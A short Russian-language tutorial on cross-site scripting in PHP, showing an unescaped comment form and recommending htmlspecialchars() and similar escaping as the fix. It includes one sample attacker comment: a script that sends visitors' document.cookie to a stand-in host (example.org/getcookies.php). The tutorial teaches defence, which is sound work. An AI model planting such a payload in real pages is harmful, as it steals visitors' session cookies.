Cross-site Scripting XSS

Позволяет украсть информацию пользователя, например куки. Все приложения, которые выводят пользовательский ввод подвержены этой атаке.

Например, рассмотрим следующую форму для оставления комментария:

<form method="POST" action="process.php">
    <p>Add a comment:</p>
    <p>
        <textarea name="comment"></textarea>
    </p>

    <p>
        <input type="submit">
    </p>
</form>

Допустим, что злоумышленник пытается оставить такой комментарий:

<script>
   document.location =
      'http://example.org/getcookies.php?cookies='
      + document.cookie;
</script>

Теперь любой, кто посетит эту страницу, будет средиректен на данную страницу, а куки пользователя будут добавлены в строку запроса. У себя злоумышленник может запросто получить к ним доступ через $_GET['cookies']

Злоумышленник вводит код/ссылку через HTML/CSS/Javascript на вашу страницу, который изменяет ее поведение на что-нибудь вредоносное. Атака может быть предотвращена с помощью экранирования и валидации данных, например функциями htmlspecialchars(), htmlentities() или strip_tags().